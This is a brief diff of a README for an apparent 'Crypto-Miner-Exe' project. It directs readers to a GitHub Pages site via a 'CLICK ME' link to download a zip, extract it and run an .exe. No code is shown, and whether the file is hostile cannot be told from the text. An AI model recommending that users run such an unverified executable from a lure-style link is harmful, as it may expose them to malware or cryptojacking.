Unknown18-afk/Crypto-Miner-Exe/README.md

 - It will give you an exe file, Run the Crypto-Miner-Exe Option 2: Website

-- Visit the website to download - [ https://unknown18-afk.github.io/Miner-Website18 ]
+- Visit the website to download - <a href="https://unknown18-afk.github.io/Miner-Website18" > CLICK ME
 - Extract the zip file and run the .exe.

 **Made By:-**